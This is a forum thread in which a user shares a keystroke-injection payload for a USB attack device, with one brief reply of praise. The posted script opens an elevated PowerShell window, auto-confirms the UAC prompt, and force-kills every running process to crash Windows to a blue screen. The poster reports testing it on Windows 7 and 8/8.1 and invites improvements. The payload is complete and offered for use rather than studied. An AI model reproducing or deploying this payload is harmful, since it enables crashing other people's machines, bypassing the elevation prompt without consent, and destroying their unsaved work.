Jump to content

[Payload] Windows BSOD


DarkN3ss

Recommended Posts

Hey guy so this is my first payload published on here (Sorry if its in the wrong place :P ). Anyway my payload causes the computer to crash to a Blue Screen

DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING get-process | stop-process -force
ENTER
How it works is by killing all the processes on the computer until it crashes to a BSOD. I have tested this on Windows 7 and 8/8.1
This should be reasonably safe, along as the user doesn't have any unsaved documents open.
Feel free to tweak it and post tweaks here as I would like to see if it can be improved :)
Link to comment
Share on other sites

Nice! This is one script that I don't want to accidentally test on my main PC!

Link to comment
Share on other sites

  • 4 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...